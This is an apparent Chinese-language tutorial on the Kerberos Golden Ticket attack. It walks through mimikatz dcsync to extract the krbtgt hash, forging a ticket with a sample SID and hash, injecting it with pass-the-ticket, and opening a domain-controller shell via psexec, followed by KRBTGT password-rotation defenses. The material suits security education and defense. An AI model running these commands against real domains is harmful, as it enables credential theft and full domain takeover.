第一個問題:如何證明你本人是XXX用戶的問題 由Authentication Server負責
第二個問題:提供服務的服務器如何知道你有權限訪問它提供的服務。當一個Client去訪問Server服務器上的某服務時,Server如何判斷Client是否有權限來訪問自己主機上的服務。 由Ticket Granting Server負責
針對Kerberos協議需要解決的第一個問題:如何證明你本人是XXX用戶的問題。攻擊者提出了一種思路,偽造身份證明的TGT票據進行攻擊,所以出現了一種針對Kerberos認證的攻擊手法-偽造TGT黃金票據。
Golden Ticket(黃金票據)是通過偽造的TGT(Ticket Granting Ticket),因為只要有了高權限的TGT,那么就可以發送給TGS換取任意服務的TGS,可以說能夠偽造黃金票據既有了域內的最高權限。
高權限的TGT:包含PAC,PAC包含Client的sid,Client所在的組,偽造域管理員賬號你就有了域管理員權限
ticket傳遞攻擊,通過傳遞Kerberos的ticket,登陸機器,簡稱PTT
偽造黃金票據
由於黃金票據是偽造的TGT,所以與域控制器沒有AS-REQ或AS-REP(步驟1和2)通信,直接進入認證的第三步當作TGS-REQ的一部分被發送到域控制器以獲得服務票據(TGS)。
制作黃金票據的條件:
1. 域名稱
2. 域的SID值 #通過whoamo /user 去掉最后橫線的數字剩下的就是SID
3. 域的KRBTGT賬戶NTLM-HASH
4. 偽造用戶名,可以是任意用戶名
第一步 獲取krbtgt的哈希值
通過mimikatz中的 lsadump::dcsync /domain:superman.com /user:krbtgt 命令獲取krbtgt的哈希值
第二步 偽造票據
得到krbtgt hash之后使用mimikatz中的Kerberos::golden功能生成金票golden.kiribi,即偽造成功的TGT
mimikatz # kerberos::golden /admin:administrator /domain:superman.com /sid:S-1-5-21-259090122-541454442-2960687606 /krbtgt:5bba52548e7171b4529f93f758ef66e8 /ticket:golden.kiribi
第三步 獲取權限
清空本地票據緩存,導入偽造的票據
kerberos::list #查看本地保存的票據,觀察client name
kerberos::purge #清除本地票據緩存
Kerberos::ptt golden kiribi #導入偽造的黃金票據
kerberos::list #查看本地保存的票據,觀察client name是否變為我們票據中的用戶名
第四步 利用偽造的黃金票據
使用psexec工具 psexec.exe \\域控機計算機名 cmd.exe
得到一個cmd命令行,whoami查看用戶為我們偽造的administrator
黃金票據使用場景:有一個domain amdin 權限的用戶shell,獲取krbtgt,sid和ntlm-hash的權限,就可以偽造任意用戶
防御方法:
1.限制域管理員登錄到除域控制器和少數管理服務器以外的任何其他計算機。這降低攻擊者通過橫向擴展,獲取域管理員的賬戶,獲得訪問域控制器的Active Directory的ntds.dit的權限。如果攻擊者無法訪問AD數據庫(ntds.dit文件),則無法獲取到KRBTGT帳戶密碼。
2.建議定期更改KRBTGT密碼。更改一次,然后讓AD備份,並在12到24小時后再次更改它。這個過程應該對系統環境沒有影響。這個過程應該是確保KRBTGT密碼每年至少更改一次的標准方法。
3.一旦攻擊者獲得了KRBTGT帳號密碼哈希的訪問權限,就可以隨意創建黃金票據。通過快速更改KRBTGT密碼兩次,使任何現有的黃金票據(以及所有活動的Kerberos票據)失效。這將使所有Kerberos票據無效,並消除攻擊者使用其KRBTGT創建有效金票的能力。
對第三種防御方法的解釋如下:
老密碼
登錄兩台機器
新密碼1
有一個新密碼1,以后登錄要用新密碼1登錄,但是已經用老密碼登錄的不會被下線
新密碼2
有一個新密碼2,以后登錄要用新密碼2登錄,但是已經用新密碼1登錄的用戶不會被下線
總結
1.偽造黃金票據要知道krbtgt賬號的NTLM-hash
2.黃金票據能用在權限提升和權限維持
3.利用mimikatz工具在win2003以下包括win2003在導入黃金票據報錯
作者:我要變超人